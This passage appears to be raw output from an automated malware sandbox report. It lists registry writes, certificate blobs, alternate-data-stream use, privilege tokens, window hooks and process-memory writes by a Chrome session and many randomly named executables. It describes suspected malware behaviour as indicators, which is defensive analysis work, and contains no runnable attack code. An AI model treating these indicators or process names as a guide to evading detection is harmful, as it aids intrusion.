Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "11806" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "11806" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "227720" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Set value (int) 
\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "29531" SearchApp.exe -
Processes:
kav21.3.10.391en_26075.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e98
7d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 kav21.3.10.391en_26075.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 kav21.3.10.391en_26075.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 kav21.3.10.391en_26075.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 
0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603
551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 kav21.3.10.391en_26075.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 kav21.3.10.391en_26075.exe -
NTFS ADS 4 IoCs
Processes:
rkfree_setup64.exe
description ioc process
File opened for modification C:\ProgramData\rkfree:uninst rkfree_setup64.exe
File opened for modification C:\ProgramData\rvlkl:cfg rkfree_setup64.exe
File opened for modification C:\ProgramData\rvlkl:uninst rkfree_setup64.exe
File opened for modification C:\ProgramData\rkfree:cfg rkfree_setup64.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc
HTTP User-Agent header 567 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header 679 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header 685 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 4 IoCs
Processes:
pid process
3080
3080
3080
3080 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeInstall.exeQ_al8h5yJr2pfKnyjDa7K4bP.exeInstall.exeInstall.exerd1hX32qxbTEj_w1iCuwV_j3.exeVFAG5UfCz7e3IdvdI8v01u_M.exeiZr04NHQo2wt4BXC1sIRm5E6.exepid process 1316 chrome.exe 1316 chrome.exe 5068 chrome.exe 5068 chrome.exe 1332 chrome.exe 1332 chrome.exe 448 chrome.exe 448 chrome.exe 4324 chrome.exe 4324 chrome.exe 5516 chrome.exe 5516 chrome.exe 220 chrome.exe 220 chrome.exe 5176 chrome.exe 5176 chrome.exe 2820 chrome.exe 2820 chrome.exe 1372 chrome.exe 1372 chrome.exe 1372 chrome.exe 1372 chrome.exe 5084 chrome.exe 5084 chrome.exe 3840 chrome.exe 3840 chrome.exe 2572 chrome.exe 2572 chrome.exe 4944 Install.exe 4944 Install.exe 4944 Install.exe 4944 Install.exe 4944 Install.exe 4944 Install.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 4196 Install.exe 4196 Install.exe 4196 Install.exe 4196 Install.exe 4196 Install.exe 4196 Install.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 5840 Install.exe 5840 Install.exe 5840 Install.exe 5840 Install.exe 5840 Install.exe 5840 Install.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes:
rvlkl.exe taskmgr.exe cmd.exe
pid process
3496 rvlkl.exe
3080
8276 taskmgr.exe
5564 cmd.exe -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
pid process
668
668
668
668 -
Suspicious behavior: MapViewOfSection 15 IoCs
Processes:
cmd.exe 0ESIFYudXNYZaYrWCRa9HdY_.exe cmd.exe cmd.exe
pid process
2784 cmd.exe
2784 cmd.exe
2220 0ESIFYudXNYZaYrWCRa9HdY_.exe
1252 cmd.exe
1252 cmd.exe
3080
3080
3080
3080
5564 cmd.exe
5564 cmd.exe
5564 cmd.exe
5564 cmd.exe
5564 cmd.exe
5564 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Processes:
chrome.exemsedge.exemsedge.exechrome.exepid process 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 36048 msedge.exe 36048 msedge.exe 37036 chrome.exe 37036 chrome.exe 37036 chrome.exe 37036 chrome.exe 37036 chrome.exe 37036 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Q_al8h5yJr2pfKnyjDa7K4bP.exeqkftJGDPHrj6GpoYfaz9kGzw.exerobocopy.execNqK1rl2lwvcIXjaMDuEDhDV.exemRs1315_U1bIiV5F6j7EgWjc.exeVFAG5UfCz7e3IdvdI8v01u_M.exeiZr04NHQo2wt4BXC1sIRm5E6.exeKBHKAC88D1F3HM2.exenIS_6lAPkuiAD1vGQNmAscKo.exerd1hX32qxbTEj_w1iCuwV_j3.exe0M20GBJKA66FG9A.exe49AAFB727CL5GDI.exetaskkill.exehe1ZfC3bR4eCfnDzT1OlvgXI.exeuEu3BlPDRxDD3lXheMCJwF3k.exeAppLaunch.exeSpCSbJF2gtnaYf15VB7gkWOO.exetaskmgr.exeInstallUtil.exedescription pid process Token: SeDebugPrivilege 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe Token: SeDebugPrivilege 3608 qkftJGDPHrj6GpoYfaz9kGzw.exe Token: SeBackupPrivilege 5900 robocopy.exe Token: SeRestorePrivilege 5900 robocopy.exe Token: SeSecurityPrivilege 5900 robocopy.exe Token: SeTakeOwnershipPrivilege 5900 robocopy.exe Token: SeDebugPrivilege 5988 cNqK1rl2lwvcIXjaMDuEDhDV.exe Token: SeDebugPrivilege 4288 mRs1315_U1bIiV5F6j7EgWjc.exe Token: SeDebugPrivilege 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe Token: SeDebugPrivilege 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe Token: SeDebugPrivilege 47800 KBHKAC88D1F3HM2.exe Token: SeDebugPrivilege 2412 nIS_6lAPkuiAD1vGQNmAscKo.exe Token: SeDebugPrivilege 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe Token: SeDebugPrivilege 50772 0M20GBJKA66FG9A.exe Token: SeDebugPrivilege 50956 49AAFB727CL5GDI.exe Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeDebugPrivilege 6944 taskkill.exe Token: SeDebugPrivilege 3488 he1ZfC3bR4eCfnDzT1OlvgXI.exe Token: SeDebugPrivilege 1732 uEu3BlPDRxDD3lXheMCJwF3k.exe Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeDebugPrivilege 50916 AppLaunch.exe Token: SeDebugPrivilege 4028 SpCSbJF2gtnaYf15VB7gkWOO.exe Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 
Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeDebugPrivilege 8276 taskmgr.exe Token: SeSystemProfilePrivilege 8276 taskmgr.exe Token: SeCreateGlobalPrivilege 8276 taskmgr.exe Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeDebugPrivilege 6728 InstallUtil.exe Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exetaskmgr.exepid process 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 3080 8276 taskmgr.exe 8276 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exetaskmgr.exepid process 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 3080 3080 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
rkfree_setup_301_password_123.exerkfree_setup64.exervlkl.exeInstall.exeQ_al8h5yJr2pfKnyjDa7K4bP.exeInstall.exeInstall.exe9ttTG63SaCJEubu9iGdOslGV.exeOtV01fNRpBSqIMPnvBIz_5U1.exeX70ItBxukSvymp13PgQhBSOh.exe8yRrDWZmXks9IvL_IS0nj_06.exe0ESIFYudXNYZaYrWCRa9HdY_.exeiZr04NHQo2wt4BXC1sIRm5E6.exeMmwt5y3s3zj3YZRq2H7QWLkZ.exetW7Y0_b8aGCZGB9K4Cnu3Izl.exerd1hX32qxbTEj_w1iCuwV_j3.exeVFAG5UfCz7e3IdvdI8v01u_M.exe1GPK0P7aXVq71TQv22DqyPmM.exejR5Q7PgDKXRyFifhSjYEWAo0.exemRs1315_U1bIiV5F6j7EgWjc.execNqK1rl2lwvcIXjaMDuEDhDV.exeepJtHFnMJr1xk7GmIRKBf6e5.exeInstall.exejR5Q7PgDKXRyFifhSjYEWAo0.tmpInstall.exeHees5gyHhxQ9S2TKRxCAvjcm.exeepJtHFnMJr1xk7GmIRKBf6e5.exedllhusts.exeMID2G1BELCG7H55.execmd.exeuEu3BlPDRxDD3lXheMCJwF3k.exehe1ZfC3bR4eCfnDzT1OlvgXI.exeKD005C2835911EG.exeRegAsm.exeOtV01fNRpBSqIMPnvBIz_5U1.exeSearchApp.exeUpdater.exeOtV01fNRpBSqIMPnvBIz_5U1.exeOtV01fNRpBSqIMPnvBIz_5U1.exebuild2.exexsv.exebuild3.exeRehab.exe.pifpid process 5736 rkfree_setup_301_password_123.exe 6028 rkfree_setup64.exe 3496 rvlkl.exe 3496 rvlkl.exe 3496 rvlkl.exe 3496 rvlkl.exe 4944 Install.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 4196 Install.exe 5840 Install.exe 3264 9ttTG63SaCJEubu9iGdOslGV.exe 2400 OtV01fNRpBSqIMPnvBIz_5U1.exe 1944 X70ItBxukSvymp13PgQhBSOh.exe 3548 8yRrDWZmXks9IvL_IS0nj_06.exe 2220 0ESIFYudXNYZaYrWCRa9HdY_.exe 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe 3836 Mmwt5y3s3zj3YZRq2H7QWLkZ.exe 5292 tW7Y0_b8aGCZGB9K4Cnu3Izl.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 5316 1GPK0P7aXVq71TQv22DqyPmM.exe 3956 jR5Q7PgDKXRyFifhSjYEWAo0.exe 4288 mRs1315_U1bIiV5F6j7EgWjc.exe 5988 cNqK1rl2lwvcIXjaMDuEDhDV.exe 3720 epJtHFnMJr1xk7GmIRKBf6e5.exe 3568 Install.exe 12868 jR5Q7PgDKXRyFifhSjYEWAo0.tmp 5092 Install.exe 2204 Hees5gyHhxQ9S2TKRxCAvjcm.exe 44000 epJtHFnMJr1xk7GmIRKBf6e5.exe 3772 dllhusts.exe 4244 MID2G1BELCG7H55.exe 5564 cmd.exe 1732 uEu3BlPDRxDD3lXheMCJwF3k.exe 3488 he1ZfC3bR4eCfnDzT1OlvgXI.exe 4944 KD005C2835911EG.exe 4944 KD005C2835911EG.exe 2068 RegAsm.exe 5632 
OtV01fNRpBSqIMPnvBIz_5U1.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 8360 Updater.exe 5564 cmd.exe 8820 OtV01fNRpBSqIMPnvBIz_5U1.exe 11168 OtV01fNRpBSqIMPnvBIz_5U1.exe 4364 build2.exe 3396 xsv.exe 10952 build3.exe 11480 Rehab.exe.pif 3080 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 3080 3080 3080 3080 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 5068 wrote to memory of 3392 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 3392 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 
1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1316 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1316 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe
Processes
-
- "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.logixoft.com/es-es/index
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc66a24f50,0x7ffc66a24f60,0x7ffc66a24f70
